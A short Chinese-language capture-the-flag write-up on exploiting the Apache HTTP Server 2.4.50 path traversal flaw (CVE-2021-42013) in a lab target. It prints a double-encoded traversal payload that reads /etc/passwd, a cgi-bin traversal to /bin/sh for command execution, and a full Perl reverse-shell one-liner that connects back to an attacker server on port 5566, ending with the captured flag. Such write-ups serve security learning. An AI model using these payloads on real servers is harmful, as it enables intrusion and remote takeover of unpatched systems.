Apache HTTP Server 2.4.50 路径穿越漏洞（CVE-2021-42013）

1. 靶机介绍😍

这是一个nday，apache中间件漏洞，比较简单吧，也是首次做这种的夺旗题，蛮有意思的。

2. 开始开始🤔

首先我们进入它给的靶机地址，it work！ 十分醒目，记住这个是apache。

我学的只知道具有一个icons目录，可以对这个目录进行路径穿越，访问到敏感文件

因为这里说了，是第一次路径穿越没有严谨，对../进行二次编码即可。

没错，正如我所学的那样，对路径进行穿越😁😁😁😁

payload：

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

我们访问成功了，证实了这个漏洞的存在。接下来对它进行命令执行，看看是否成功 echo;whoami

因为要添加消息体，所以使用POST传参，改一下get就行了

在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

然后命令执行成功

接下来就是反弹shell，拿flag的时候了，美滋滋😍😍😍😍。

echo;perl -e 'use Socket;$i="服务器IP地址";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

服务器开启监听 5566端口

3. 拿下拿下😏

使用命令反弹shell成功

激动人心的拿flag时候到了，ls发现没有相关文件。

cd 切换上级目录，发现，flag.sh

cat之后自动转换了

回到相关目录拿到flag。

go-flag{9f1fdb2f-2a05-4722-9667-aeea38a65204}